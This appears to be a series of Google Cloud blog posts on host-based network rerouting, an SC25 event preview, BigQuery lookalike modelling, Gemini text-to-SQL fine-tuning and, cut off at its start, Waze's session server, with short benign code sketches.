Cloud infrastructure reliability is foundational, yet even the most sophisticated global networks can suffer from a critical issue: slow or failed recovery from routing outages. In massive, planetary-scale networks like Google’s, router failures or complex, hidden conditions can prevent traditional routing protocols from restoring service quickly, or sometimes at all. These brief but costly outages — what we call slow convergence or convergence failure — critically disrupt real-time applications with low tolerance to packet loss and, most acutely, today’s massive, sensitive AI/ML training jobs, where a brief network hiccup can waste millions of dollars in compute time.
To solve this problem, we pioneered Protective ReRoute (PRR), a radical shift that moves the responsibility for rapid failure recovery from the centralized network core to the distributed endpoints themselves. Since putting it into production over five years ago, this host-based mechanism has dramatically increased the resilience of Google’s network, proving effective in recovering from up to 84% of inter-data-center outages that would otherwise have been caused by slow convergence events. Google Cloud customers with workloads that are sensitive to packet loss can also enable it in their environments — read on to learn more.
The limits of in-network recovery
Traditional routing protocols are essential for network operation, but they are often not fast enough to meet the demands of modern, real-time workloads. When a router or link fails, the network must recalculate all affected routes, which is known as reconvergence. In a network the size of Google’s, this process can be complicated by the scale of the topology, leading to delays that range from many seconds to minutes. For distributed AI training jobs with their wide, fan-out communication patterns, even a few seconds of packet loss can lead to application failure and costly restarts. The problem is a matter of scale: as the network grows, the likelihood of these complex failure scenarios increases.
Protective ReRoute: A host-based solution
Protective ReRoute is a simple, effective concept: empower the communicating endpoints (the hosts) to detect a failure and intelligently re-steer traffic to a healthy, parallel path. Instead of waiting for a global network update, PRR capitalizes on the rich path diversity built into our network. The host detects packet loss or high latency on its current path, and then immediately initiates a path change by modifying carefully chosen packet header fields, which tells the network to use an alternate, pre-existing path.
This architecture represents a fundamental shift in network reliability thinking. Traditional networks rely on a combination of parallel and series reliability. Placing components in series tends to reduce the reliability of a system; in a large-diameter network with multiple forwarding stages, reliability degrades as the diameter increases, because every forwarding stage affects the whole system. Even if a network stage is designed with parallel reliability, it has a serial impact on the overall network while that stage reconverges. By adding PRR at the edges, we treat the network as a highly parallel system of end-to-end paths that appears as a single stage, whose overall reliability increases with the number of available paths, and that number grows exponentially with the network diameter. This effectively circumvents the serialization effects of slow network convergence in a large-diameter network. The following diagram contrasts the system reliability model for a PRR-enabled network with that of a traditional network: traditional network reliability is inversely proportional to the number of forwarding stages, while with PRR the reliability of the same network is directly proportional to the number of composite paths, which grows exponentially with the network diameter.
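To make the series-versus-parallel contrast concrete, here is a toy reliability calculation in Python. The per-stage and per-path availability figures are invented for illustration and are not Google measurements.

```python
from math import prod

def series_reliability(stage_reliabilities):
    # Every stage must work, so reliability shrinks as stages are chained in series.
    return prod(stage_reliabilities)

def parallel_reliability(path_reliabilities):
    # Only one path must work, so reliability grows with each independent parallel path.
    return 1 - prod(1 - r for r in path_reliabilities)

# Ten forwarding stages at 99.9% each lose about 1% availability end to end...
print(f"10 stages in series: {series_reliability([0.999] * 10):.6f}")   # ~0.990045
# ...while four independent end-to-end paths at 99% each all fail together only ~1e-8 of the time.
print(f"4 paths in parallel: {parallel_reliability([0.99] * 4):.8f}")   # ~0.99999999
```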
How Protective ReRoute works
The PRR mechanism has three core functional components:
End-to-end failure detection: Communicating hosts continuously monitor path health. On Linux systems, the standard mechanism uses TCP retransmission timeout (RTO) to signal a potential failure. The time to detect a failure is generally a single-digit multiple of the network’s round-trip time (RTT). There are also other methods for end-to-end failure detection that have varying speed and cost.
Packet-header modification at the host: Once a failure is detected, the transmitting host modifies a packet-header field to influence the forwarding path. To achieve this, Google pioneered and contributed the mechanism that modifies the IPv6 flow-label in the Linux kernel (version 4.20+). Crucially, the Google software-defined network (SDN) layer provides protection for IPv4 traffic and non-Linux hosts as well by performing the detection and repathing on the outer headers of the network overlay.
PRR-aware forwarding: Routers and switches in the multipath network respect this header modification and forward the packet onto a different, available path that bypasses the failed component. (A conceptual end-to-end sketch of these three components follows.)
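As a purely conceptual illustration of how these three components fit together, the following Python sketch models an endpoint that reacts to a retransmission timeout by changing a header field so that a multipath network hashes its flow onto a different pre-existing path. This is not the kernel or SDN implementation; the path names, hash, and re-steering policy are invented.

```python
import hashlib
import random

PATHS = ["path-a", "path-b", "path-c", "path-d"]  # parallel paths already built into the network

def forward(flow_label: int) -> str:
    # PRR-aware forwarding: the network hashes a header field to pick among available paths.
    digest = hashlib.sha256(flow_label.to_bytes(4, "big")).digest()
    return PATHS[digest[0] % len(PATHS)]

class Endpoint:
    def __init__(self):
        self.flow_label = random.getrandbits(20)  # the IPv6 flow label is a 20-bit field

    def on_retransmission_timeout(self):
        # End-to-end failure detection fired; modify the header field so that
        # subsequent packets are steered onto a different, healthy path.
        old_path = forward(self.flow_label)
        while forward(self.flow_label) == old_path:
            self.flow_label = random.getrandbits(20)
        print(f"RTO: re-steered from {old_path} to {forward(self.flow_label)}")

Endpoint().on_retransmission_timeout()
```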
Proof of impact
PRR is not theoretical; it is a continuously deployed, 24×7 system that protects production traffic worldwide. Its impact is compelling: PRR has been shown to reduce network downtime caused by slow convergence and convergence failures by up to the above-mentioned 84%. This means that up to 8 out of every 10 network outages that would have been caused by a router failure or slow network-level recovery are now avoided by the host. Furthermore, host-initiated recovery is extremely fast, often resolving the problem in a single-digit multiple of the RTT, which is vastly faster than traditional network reconvergence times.
Key use cases for ultra-reliable networking
The need for PRR is growing, driven by modern application requirements:
AI/ML training and inference: Large-scale workloads, particularly those distributed across many accelerators (GPUs/TPUs), are uniquely sensitive to network reliability. PRR provides the ultra-reliable data distribution necessary to keep these high-value compute jobs running without disruption.
Data integrity and storage: Significant numbers of dropped packets can result in data corruption and data loss, not just reduced throughput. By reducing the outage window, PRR improves application performance and helps guarantee data integrity.
Real-time applications: Applications like gaming and services like video conferencing and voice calls are intolerant of even brief connectivity outages. PRR reduces the recovery time for network failures to meet these strict real-time requirements.
Frequent short-lived connections: Applications that rely on a large number of very frequent short-lived connections can fail when the network is unavailable for even a short time. By reducing the expected outage window, PRR helps these applications reliably complete their required connections.
Activating Protective ReRoute for your applications
The architectural shift to host-based reliability is an accessible technology for Google Cloud customers. The core mechanism is open and part of the mainline Linux kernel (version 4.20 and later).
You can benefit from PRR in two primary ways:
Hypervisor mode: PRR automatically protects traffic running across Google data centers without requiring any guest OS changes. Hypervisor mode provides recovery in single-digit seconds for traffic with moderate fan-out in specific areas of the network.
Guest mode: For critical, performance-sensitive applications with high fan-out, and in any segment of the network, you can opt into guest-mode PRR, which enables the fastest possible recovery time and the greatest control. This is the optimal setting for demanding mission-critical applications, AI/ML jobs, and other latency-sensitive services.
To activate guest-mode PRR for critical applications, follow the guidance in the documentation and be ready to ensure the following (a quick prerequisite check is sketched after this list):
Your VM runs a modern Linux kernel (4.20+).
Your applications use TCP.
The application traffic uses IPv6. For IPv4 protection, the application needs to use the gVNIC driver.
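A minimal sketch of how you might pre-check the first two items from inside a VM, assuming a Linux guest. It only inspects the kernel version and the IPv6 stack; it does not confirm that guest-mode PRR is enabled, that your traffic actually uses TCP over IPv6, or that the gVNIC driver is in use for IPv4, so follow the documentation for the authoritative steps.

```python
import platform
import socket

def guest_prr_precheck(min_kernel=(4, 20)):
    release = platform.release()                     # e.g. "6.1.0-21-cloud-amd64"
    major, minor = release.split(".")[:2]
    kernel_ok = (int(major), int(minor.split("-")[0])) >= min_kernel
    return {
        "kernel_release": release,
        "kernel_4_20_plus": kernel_ok,
        "ipv6_stack_present": socket.has_ipv6,
    }

print(guest_prr_precheck())
```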
Get started
The availability of Protective ReRoute has profound implications for a variety of Google and Google Cloud users.
For cloud customers with critical workloads: Evaluate and enable guest-mode PRR for applications that are sensitive to packet loss and that require the fastest recovery time, such as large-scale AI/ML jobs or real-time services.
For network architects: Re-evaluate your network reliability architectures. Consider the benefits of designing for rich path diversity and empowering endpoints to intelligently route around failures, shifting your model from series to parallel reliability.
For the open-source community: Recognize the power of host-level networking innovations. Contribute to and advocate for similar reliability features across all major operating systems to create a more resilient internet for everyone.
With the pace of scientific discovery moving faster than ever, we’re excited to join the supercomputing community as it gets ready for its annual flagship event, SC25, in St. Louis from November 16-21, 2025. There, we’ll share how Google Cloud is poised to help with our lineup of HPC and AI technologies and innovations, helping researchers, scientists, and engineers solve some of humanity’s biggest challenges.
Redefining supercomputing with cloud-native HPC
Supercomputers are evolving from a rigid, capital-intensive resource into an adaptable, scalable service. To go from “HPC in the cloud” to “cloud-native HPC,” we leverage core principles of automation and elastic infrastructure to fundamentally change how you consume HPC resources, allowing you to spin up purpose-built clusters in minutes with the exact resources you need.
This cloud-native model is very flexible. You can augment an on-premises cluster to meet peak demand or build a cloud-native system tailored with the right mix of hardware for your specific problem — be it the latest CPUs, GPUs, or TPUs. With this approach, we’re democratizing HPC, putting world-class capabilities into the hands of startups, academics, labs, and enterprise teams alike.
Key highlights at SC25:
Next-generation infrastructure: We’ll be showcasing our latest H4D VMs, powered by 5th generation AMD EPYC processors and featuring Cloud RDMA for low-latency networking. You’ll also see our latest accelerated compute resources including A4X and A4X Max VMs featuring the latest NVIDIA GPUs with RDMA.
Powering your essential applications: Run your most demanding simulations at massive scale — from Computational Fluid Dynamics (CFD) with Ansys, to Computer-Aided Engineering with Siemens, computational chemistry with Schrodinger, and risk modeling in FSI.
Dynamic Workload Scheduler: Discover how Dynamic Workload Scheduler and its innovative Flex Start mode, integrated with familiar schedulers like Slurm, is reshaping HPC consumption. Move beyond static queues toward flexible, cost-effective, and efficient access to high-demand compute resources.
Easier HPC with Cluster Toolkit: Learn how Cluster Toolkit can help you deploy a supercomputer-scale cluster with less than 50 lines of code.
High-throughput, scalable storage: Get a deep dive into Google Cloud Managed Lustre, a fully managed, high-performance parallel file system that can handle your most demanding HPC and AI workloads.
Hybrid for the enterprise: For our enterprise customers, especially in financial services, we’re enabling hybrid cloud with IBM Spectrum Symphony Connectors, allowing you to migrate or burst workloads to Google Cloud and reduce time-to-solution.
AI-powered scientific discovery
There’s a powerful synergy between HPC and AI — where HPC builds more powerful AI, and AI makes HPC faster and more insightful. This complementary relationship is fundamentally changing how research is done, accelerating discovery in everything from drug development and climate modeling to new materials and engineering. At Google Cloud, we’re at the forefront of this transformation, building the models, tools, and platforms that make it possible.
What to look for:
AI for scientific productivity: We’ll be showcasing Google’s suite of AI tools designed to enhance the entire research lifecycle. From Idea Generation agent to Gemini Code Assist with Gemini Enterprise, you’ll see how AI can augment your capabilities and accelerate discovery.
AI-powered scientific applications: Learn about the latest advancements in our AI-powered scientific applications, including AlphaFold 3 and Weather Next.
The power of TPUs: Explore Google’s TPUs, including the latest seventh-generation Ironwood model, and discover how they can enhance AI workload performance and efficiency.
Join Google Cloud at SC25: At Google Cloud, we believe the cloud is the supercomputer of the future. From purpose-built HPC and AI infrastructure to quantum breakthroughs and simplified open-source tools, let Google Cloud be the platform for your next discovery.
We invite you to connect with our experts and learn more. Join the Google Cloud Advanced Computing Community to engage in discussions with our partners and the broader HPC, AI, and quantum communities.
We can’t wait to see what you discover.
See us at the show:
Visit us in booth #3724: Stop by for live demos of our latest HPC and AI solutions, including Dynamic Workload Scheduler, Cluster Toolkit, our latest AI agents, and even see our TPUs. Our team of experts will be on hand to answer your questions and discuss how Google Cloud can meet your needs.
Attend our technical talks: Keep an eye on our SC25 schedule for Google Cloud presentations and technical talks, where our leaders and partners will share deep dives, insights, and best practices.
Passport program: Grab a passport card from the Google booth and visit our demos, labs, and talks to collect stamps and learn about how we’re working with organizations across the HPC ecosystem to democratize HPC. Come back to the Google booth with your completed passport card to choose your prize!
Play a game: Join us in the Google booth and at our events to enjoy some Gemini-driven games — test your tech trivia knowledge or compete head-to-head with others to build the best LEGO creation!
Join our community kickoff: Are you a member of the Google Cloud Advanced Computing Community? Secure your spot today for our SC25 Kickoff Happy Hour!
Celebrate with NVIDIA and Google Cloud: We’re proud to co-host a reception with NVIDIA, and we look forward to toasting another year of innovation with our customers and partners. Register today to secure your spot!
Editor’s note: The post is part of a series that highlights how organizations leverage Google Cloud’s unique data science capabilities over alternative cloud data platforms. Google Cloud’s vector embedding generation and search features are unique for their end-to-end, customizable platform that leverages Google’s advanced AI research, offering features like task-optimized embedding models and hybrid search to deliver highly relevant results for both semantic and keyword-based queries.
Zeotap’s customer intelligence platform (CIP) helps brands understand their customers and predict behaviors, so that they can improve customer engagement. Zeotap partners with Google Cloud to build a customer data platform that offers privacy, security, and compliance. Zeotap CIP, built with BigQuery, enables digital marketers to build and use AI/ML models to predict customer behavior and personalize the customer experience.
The Zeotap platform includes a customer segmentation feature called lookalike audience extensions. A lookalike audience is a group of new potential customers, identified by machine learning algorithms, who share similar characteristics and behaviors with an existing, high-value customer base. However, sparse or incomplete first-party data can make it hard to create effective lookalike audiences, preventing advertising algorithms from accurately identifying the key characteristics of valuable customers that they need in order to find similar new prospects. To address such sparse features, Zeotap uses multiple machine learning (ML) methodologies that combine Zeotap’s multigraph algorithm with high-quality data assets to more accurately extend customers’ audiences between the CDP and the lookalike models.
In this blog, we dive into how Zeotap uses BigQuery, including BigQuery ML and Vector Search to solve the end-to-end lookalike problem. By taking a practical approach, we transformed a complex nearest-neighbour problem into a simple inner-join problem, overcoming challenges of cost, scale and performance without a specialized vector database. We break down each step of the workflow, from data preparation to serving, highlighting how BigQuery addresses core challenges along the way. We illustrate one of the techniques, Jaccard similarity with embeddings, to address the low-cardinality categorical columns that dominate user-profile datasets.
The high-level flow is as follows, and happens entirely within the BigQuery ecosystem. Note: In this blog, we will not be covering the flow of high-cardinality columns.
Jaccard similarity
Among the similarity indexes that return the vectors closest in embedding space, Zeotap finds Jaccard similarity to be a fitting index for low-cardinality features. Jaccard similarity is a measure of overlap between two sets, with a simple formula: |A ∩ B| / |A ∪ B|. It answers the question, “Of all the unique attributes present in either of the two users, what percentage of them are shared?” It only cares about the features that are present in at least one of the entities (e.g., the 1s in a binary vector) and ignores attributes that are absent in both.
Jaccard similarity shines because it is simple and easily explainable over many other complex distance metrics and similarity indexes that only measure distance in the embeddings space — a real Occam’s razor, as it were.
Implementation blueprint
Generating the vector embeddings: After selecting the low-cardinality features, we create our vectors using BigQuery one-hot encoding and multi-hot encoding for primitive and array-based columns, respectively.
Again, it helps to visualize a sample vector table:
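Since the sample table itself is not reproduced here, the following illustrative Python snippet shows the shape of the vectors: one-hot encoding for a primitive column and multi-hot encoding for an array column. The feature names and vocabularies are invented, and the real pipeline performs this encoding in BigQuery SQL.

```python
def one_hot(value, vocab):
    # Primitive column: exactly one position is set.
    return [1 if value == v else 0 for v in vocab]

def multi_hot(values, vocab):
    # Array column: every matching position is set.
    return [1 if v in values else 0 for v in vocab]

GENDER = ["female", "male", "unknown"]
INTERESTS = ["sports", "travel", "gaming", "cooking"]

user = {"gender": "female", "interests": ["travel", "cooking"]}
vector = one_hot(user["gender"], GENDER) + multi_hot(user["interests"], INTERESTS)
print(vector)  # [1, 0, 0, 0, 1, 0, 1]
```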
Challenge: Jaccard distance is not directly supported in BigQuery vector search!
BigQuery vector search supports three distance types (Euclidean, cosine, and dot product) but not Jaccard distance — at least not natively. However, for binary vectors the Jaccard distance (1 – Jaccard similarity) can be expressed as:
Jd(A,B) = 1 – |A∩B|/|A∪B| = (|A∪B| – |A∩B|)/|A∪B|
Using only the dot product, this can be rewritten as Jd(A,B) = 1 – (A·B) / (A·A + B·B – A·B), since for binary vectors |A∩B| = A·B and |A∪B| = A·A + B·B – A·B.
So we can, in fact, arrive at the Jaccard distance using the dot product. We found BigQuery’s out-of-the-box LP_NORM function useful for calculating the Manhattan norm, as the Manhattan norm of a binary vector is its dot product with itself. In other words, the Manhattan norm lets us express the Jaccard distance in a form that BigQuery’s supported “dot product” search can compute.
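A small Python check of that identity. This is illustrative only; in production the same arithmetic is expressed in SQL on top of BigQuery’s dot-product search and LP_NORM-derived norms.

```python
def jaccard_distance_via_dot(a, b):
    # For binary vectors: |A∩B| = a·b and |A∪B| = a·a + b·b - a·b,
    # where a·a and b·b equal the Manhattan norms of a and b.
    dot_ab = sum(x * y for x, y in zip(a, b))
    dot_aa = sum(x * x for x in a)
    dot_bb = sum(y * y for y in b)
    union = dot_aa + dot_bb - dot_ab
    return 1 - dot_ab / union if union else 0.0

a = [1, 0, 1, 1, 0]
b = [1, 1, 0, 1, 0]
# Shared attributes {0, 3}, union {0, 1, 2, 3} -> similarity 0.5, distance 0.5.
assert abs(jaccard_distance_via_dot(a, b) - 0.5) < 1e-9
```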
Building the vector index
Next, we needed to build our vector index. BigQuery supports two primary vector index types: IVF (Inverted File Index) and TREE_AH (Tree with Asymmetric Hashing), each tailored to different scenarios. The TREE_AH vector index type combines a tree-like structure with asymmetric hashing (AH), based on Google’s ScaNN algorithm, which has performed exceptionally well on various ANN benchmarks. Also, since the use case was for large batch queries (e.g., hundreds of thousands to millions of users), this offered reduced latency and cost compared to alternate vector databases.
Lookalike delivery
Once we had a vector index to optimize searches, we asked ourselves, “Should we run our searches directly using the VECTOR_SEARCH function in BigQuery?” Taking this approach over the base table yielded a whopping 118 million user-encoded vectors for just one client! Additionally, and most importantly, since this computation called for a Cartesian product, our in-memory data sizes became very large and complex quickly. We needed to devise a strategy that would scale to all customers.
The rare feature strategy
A simple but super-effective strategy is to avoid searching for ubiquitous user features. In a two-step rare-feature process, we identify the “omnipresent” features, then proceed to create a signal-rich table that includes users who possess at least one of the rarer/discriminative features. Right off the bat, we achieved up to 78% reduction in search space. BigQuery VECTOR_SEARCH allows you to do this with pre-filtering, wherein you use a subquery to dynamically shrink the search space. The catch is that the subquery cannot be a classic join, so we introduce a “flag” column and make it part of the index. Note: If a column is not stored in the index, then the WHERE clause in the VECTOR_SEARCH will execute a post-filter.
Use the BigQuery UI or system tables to see whether a vector index was used to accelerate queries.
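As a rough illustration of the rare-feature idea, here is a minimal Python sketch. The 95% ubiquity threshold and the in-memory implementation are stand-ins; the real pipeline computes this in BigQuery and exposes the result as a flag column for the pre-filtering subquery.

```python
def signal_rich_user_ids(user_vectors, ubiquity_threshold=0.95):
    """Keep users that carry at least one feature that is NOT omnipresent."""
    n_users = len(user_vectors)
    n_features = len(next(iter(user_vectors.values())))
    counts = [0] * n_features
    for vec in user_vectors.values():
        for i, bit in enumerate(vec):
            counts[i] += bit
    omnipresent = {i for i, c in enumerate(counts) if c / n_users >= ubiquity_threshold}
    return {
        uid for uid, vec in user_vectors.items()
        if any(bit and i not in omnipresent for i, bit in enumerate(vec))
    }

users = {"u1": [1, 1, 0], "u2": [1, 0, 1], "u3": [1, 0, 0]}
# Feature 0 is ubiquitous, so u3 (which has only feature 0) drops out of the search space.
print(signal_rich_user_ids(users, ubiquity_threshold=0.9))  # {'u1', 'u2'}
```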
Batch strategy
Vector search compares query users (N, the users we’re targeting) against base users (M, the total user pool, in this case 118M). The complexity increases with (M × N), making large-scale searches resource-intensive. To manage this, we applied batches to the N query users, processing them in groups (e.g., 500,000 per batch), while M remained the full base set. This approach reduced the computational load, helping to efficiently match the top 100 similar users for each query user. We then used grid search to determine the optimal batch size for high-scale requirements.
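A minimal sketch of the batching loop. The batch size and user counts are illustrative; in practice each batch becomes the query side of a VECTOR_SEARCH call while the base side remains the full vector table.

```python
def batches(items, batch_size=500_000):
    # Split the N query users into fixed-size batches; M (the base set) stays whole.
    for start in range(0, len(items), batch_size):
        yield items[start:start + batch_size]

query_user_ids = list(range(1_200_000))  # stand-in for the N query users
for i, batch in enumerate(batches(query_user_ids)):
    # Each batch is matched against the base table to find the top 100 similar users per query user.
    print(f"batch {i}: {len(batch):,} users")
```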
To summarize
We partnered with Google Cloud to enable digital marketers to build and use AI/ML models for customer segmentation and personalized experiences, driving higher conversion rates and lower acquisition costs. We addressed the challenge of Jaccard distance not being directly supported in BigQuery Vector Search by using the dot product and Manhattan norm. This practical approach, leveraging BigQuery ML and vector offerings, allowed us to create bespoke lookalike models with just one single SQL script and overcome challenges of cost, scale, and performance without a specialized vector database.
Using BigQuery ML and vector offerings, coupled with its robust, serverless architecture, we were able to release bespoke lookalike models catering to individual customer domains and needs. Together, Zeotap and Google Cloud look forward to partnering to help marketers expand their reach everywhere.
The Built with BigQuery advantage for ISVs and data providers
Built with BigQuery helps companies like Zeotap build innovative applications with Google Data Cloud. Participating companies can:
Accelerate product design and architecture through access to designated experts who can provide insight into key use cases, architectural patterns, and best practices.
Amplify success with joint marketing programs to drive awareness, generate demand, and increase adoption.
BigQuery gives ISVs the advantage of a powerful, highly scalable, unified Data Cloud for the agentic era that’s integrated with Google Cloud’s open, secure, sustainable platform. Click here to learn more about Built with BigQuery.
In the fast-evolving world of agentic development, natural language is becoming the standard for interaction. This shift is deeply connected to the power of operational databases, where a more accurate text-to-SQL capability is a major catalyst for building better, more capable agents. From empowering non-technical users to self-serve data, to accelerating analyst productivity, the ability to accurately translate natural language questions into SQL is a game-changer. As end-user engagements increasingly happen over chat, conversations become the fundamental connection between businesses and their customers.
In an earlier post, “Getting AI to write good SQL: Text-to-SQL techniques explained,” we explored the core challenges of text-to-SQL — handling complex business context, ambiguous user intent, and subtle SQL dialects — and the general techniques used to solve them.
Today, we’re moving from theory to practice. We’re excited to share that Google Cloud has scored a new state-of-the-art result on the BIRD benchmark’s Single Trained Model Track. We scored 76.13, ahead of any other single-model solution (higher is better). In general, the closer you get to the benchmark of human performance (92.96), the harder it is to score incremental gains.
BIRD (BIg Bench for LaRge-scale Database Grounded Text-to-SQL Evaluation) is an industry standard for testing text-to-SQL solutions. BIRD spans over 12,500 unique question-SQL pairs from 95 databases with a total size of 33 GB. The Single Trained Model Track is designed to measure the raw, intrinsic capability of the model itself, restricting the use of complex preprocessing, retrieval, or agentic frameworks often used to boost model accuracy. In other words, success here reflects an advancement in the model’s core ability to generate SQL.
Gemini scores #1 place in BIRD (October ‘25)
From research to industry-leading products
This leap in more accurate natural-language-to-SQL capability, often referred to as NL2SQL, isn’t just an internal research or engineering win; it fundamentally elevates the customer experience across several key data services. Our state-of-the-art research in this field is enabling us to create industry-leading products that customers leverage to activate their data with agentic AI.
Consider AlloyDB AI’s natural language capability, a tool that customers use to allow end users to query the most current operational data using natural language. For instance, companies like Hughes, an Echostar Corporation, depend on AlloyDB’s NL2SQL for critical tasks like call analytics. Numerous other retail, technology, and industry players also integrate this capability into their customer-facing applications. With NL2SQL that is near-100% accurate, customers gain the confidence to build and deploy applications in production workloads that rely on real-time data access.
The benefits of NL2SQL extend to analysis, as exemplified with conversational analytics in BigQuery. This service lets business users and data analysts explore data, run reports, and extract business intelligence from vast historical datasets using natural language. The introduction of a multi-turn chat experience, combined with a highly accurate NL2SQL engine, helps them make informed decisions with the confidence that the responses from BigQuery-based applications are consistently accurate.
Finally, developers are finding new efficiencies. They have long relied on Gemini Code Assist for code generation, aiding their application development with databases across Spanner, AlloyDB, and Cloud SQL Studio. With the availability of more accurate NL2SQL, developers will be able to use AI coding assistance to generate SQL code too.
BIRD: a proving ground for core model capability
The BIRD benchmark is one of the most commonly used benchmarks in the text-to-SQL field. It moves beyond simple, single-table queries to cover real-world challenges our models must handle, such as reasoning over very large schemas, dealing with ambiguous values, and incorporating external business knowledge. Crucially, BIRD measures a critical standard: execution-verified accuracy. This means a query is not considered ‘correct’ just because it appears right; it must also successfully run and return the correct data.
We specifically targeted the Single Trained Model Track because it allows us to isolate and measure the model’s core ability to solve the text-to-SQL task (rather than an ensemble, a.k.a., a system with multiple components such as multiple parallel models, re-rankers, etc.). This distinction is critical, as text-to-SQL accuracy can be improved with techniques like dynamic few-shot retrieval or schema preprocessing; this track reflects the model’s true reasoning power. By focusing on a single-model solution, these BIRD results demonstrate that enhancing the core model creates a stronger foundation for systems built on top of it.
Our method: Specializing the model
Achieving a state-of-the-art score doesn’t happen only by using a powerful base model. The key is to specialize the model. We developed a recipe designed to transform the model from a general-purpose reasoner into a highly specialized SQL-generation expert.
This recipe consisted of three critical phases applied before inference:
Rigorous data filtering: Ensuring the model learns from a flawless, “gold standard” dataset.
Multitask learning: Teaching the model not just to translate, but to understand the implicit subtasks required for writing a correct SQL query.
Test-time scaling: Using self-consistency to pick the best answer.
Let’s break down each step.
Our process for achieving a SOTA result
Step 1: Start with a clean foundation (data filtering)
One important tenet of fine-tuning is “garbage in, garbage out.” A model trained on a dataset with incorrect, inefficient, or ambiguous queries may learn incorrect patterns. The training data provided by the BIRD benchmark is powerful, but like most large-scale datasets, it’s not perfect.
Before we could teach the model to be a SQL expert, we had to curate a gold-standard dataset. We used a rigorous two-stage pipeline: first, execution-based validation to execute every query and discard any that failed, returned an error, or gave an empty result. Second, we used LLM-based validation, where multiple LLMs act as a “judge” to validate the semantic alignment between the question and the SQL, catching queries that run but don’t actually answer the user’s question. This aggressive filtering resulted in a smaller, cleaner, and more trustworthy dataset that helped our model learn from a signal of pure quality rather than noise.
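A simplified sketch of the first, execution-based stage, using SQLite since the BIRD databases are SQLite. The second, LLM-as-judge stage is not shown, and the function and field names are illustrative.

```python
import sqlite3

def execution_filter(examples, db_path):
    """Keep only (question, gold_sql) pairs whose SQL runs and returns a non-empty result."""
    conn = sqlite3.connect(db_path)
    kept = []
    for question, gold_sql in examples:
        try:
            rows = conn.execute(gold_sql).fetchall()
        except sqlite3.Error:
            continue          # discard queries that fail or raise an error
        if not rows:
            continue          # discard queries that return an empty result
        kept.append((question, gold_sql))
    conn.close()
    return kept
```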
Step 2: Make the model a SQL specialist (multitask learning)
With a clean dataset, we could move on to the supervised fine-tuning itself. This is the process of taking a large, general-purpose model — in our case, Gemini 2.5 Pro — and training it further on our narrow, specialized dataset to make it an expert in a specific task.
To build these skills directly into the model, we leveraged the publicly available Supervised Tuning API for Gemini on Vertex AI. This service provided the foundation for our multitask supervised fine-tuning (SFT) approach, where we trained Gemini 2.5 Pro on several distinct-but-related tasks simultaneously.
We also extended our training data to cover tasks outside of the main Text-to-SQL realm, helping enhance the model’s reasoning, planning, and self-correction capabilities.
By training on this combination of tasks in parallel, the model learns a much richer, more robust set of skills. It goes beyond simple question-to-query mapping — it learns to deeply analyze the problem, plan its approach, and refine its own logic, leading to drastically improved accuracy and fewer errors.
Step 3: Inference accuracy + test-time scaling with self-consistency
The final step was to ensure we could reliably pick the model’s single best answer at test time. For this, we used a technique called self-consistency.
With self-consistency, instead of asking the model for just one answer, we ask it to generate several query candidates for the same question. We then execute these queries, cluster them by their execution results, and select a representative query from the largest cluster. This approach is powerful because if the model arrives at the same answer through different reasoning paths, that answer has a much higher probability of being correct.
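A minimal sketch of that selection step, again using SQLite as a stand-in for the benchmark databases. The real pipeline’s candidate generation and clustering details are not published here, so the helper below is only illustrative.

```python
import sqlite3
from collections import defaultdict

def pick_by_self_consistency(candidate_queries, db_path):
    """Execute each candidate, cluster by execution result, return one query from the largest cluster."""
    clusters = defaultdict(list)
    conn = sqlite3.connect(db_path)
    for sql in candidate_queries:
        try:
            rows = conn.execute(sql).fetchall()
        except sqlite3.Error:
            continue                               # failed candidates don't get a vote
        clusters[frozenset(rows)].append(sql)      # order-insensitive signature of the result set
    conn.close()
    if not clusters:
        return None
    return max(clusters.values(), key=len)[0]      # any representative of the majority cluster
```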
It’s important to note that self-consistency is a standard, efficient method, but it is not the only way to select a query. More complex, agentic frameworks can achieve even higher accuracy. For example, our team’s own research on CHASE-SQL (our state-of-the-art ensembling methodology) demonstrates that using diverse candidate generators and a trained selection agent can significantly outperform consistency-based methods.
For this benchmark, we wanted to focus on the model’s core performance. Therefore, we used the more direct self-consistency method: we generated several queries, executed them, and selected a query from the group that produced the most common result. This approach allowed us to measure the model’s raw text-to-SQL ability, minimizing the influence of a more complex filtering or reranking system.
The BIRD Single-Model Track explicitly allows for self-consistency, which reflects the model’s own internal capabilities. The benchmark categorizes submissions based on the number of candidates used (‘Few’, ‘Many’, or ‘Scale’). We found our “sweet spot” in the “Few” (1-7 candidates) category.
This approach gave us the final, critical boost in execution accuracy that pushed our model to the top of the leaderboard. More importantly, it proves our core thesis: by investing in high-quality data and instruction tuning, you can build a single model that is powerful enough to be production-ready without requiring a heavy, high-latency inference framework.
A recipe for customizing Gemini for text-to-SQL
A combination of clean data, multi-task learning, and efficient self-consistency allowed us to take the powerful Gemini 2.5 Pro model and build a specialist that achieved the top-ranking score on the BIRD single-model benchmark.
Our fine-tuned model represents a much stronger baseline for text-to-SQL. However, it’s important to note that this score is not the upper bound of accuracy. Rather, it is the new, higher baseline we have established for the core model’s capability in a constrained setting. These results can be further amplified by either
creating an ensemble, aka integrating this specialist model into a broader system that employs preprocessing (like example retrieval) or agentic scaffolding (like our CHASE-SQL research), or
optimizing model quality for your unique database by enhancing metadata and/or query examples (which is how our customers typically deploy production workloads).
Nevertheless, the insights from this research are actively informing how we build our next-generation AI-powered products for Google Data Cloud, and we’ll continue to deliver these enhancements in our data services.
Explore advanced text-to-SQL capabilities today
We’re constantly working to infuse our products with these state-of-the-art capabilities, starting with bringing natural language queries to applications built on AlloyDB and BigQuery. For AI-enhanced retrieval, customers especially value AlloyDB and its AI functions. AlloyDB integrates AI capabilities directly into the database, allowing developers to run powerful AI models using standard SQL queries without moving data. It offers specialized operators such as AI.IF() for intelligent filtering, AI.RANK() for semantic reranking of search results, and AI.GENERATE() for in-database text generation and data transformation.
And if you want to write some SQL yourself, Gemini Code Assist can help. With a simple prompt, you can instruct Gemini as to the query you want to create. Gemini will generate your code and you can immediately test it by executing it against your database. We look forward to hearing about what you build with it!
Editor’s note: Waze (a division of Google parent company Alphabet) depends on vast volumes of dynamic, real-time user session data to power its core navigation features, but scaling that data to support concurrent users worldwide required a new approach. Their team built a centralized Session Server backed by Memorystore for Redis Cluster, a fully managed service with 99.99% availability that supports partial updates and easily scales to Waze’s use case of over 1 million MGET commands per second with ~1ms latency. This architecture is the foundation for Waze’s continued backend modernization.
Real-time data drives the Waze app experience. Our turn-by-turn guidance, accident rerouting, and driver alerts depend on up-to-the-millisecond accuracy. But keeping that experience seamless for millions of concurrent sessions requires robust, battle-hardened infrastructure built to manage a massive stream of user session data. This includes active navigation routes, user location, and driver reports that can appear and evolve within seconds.
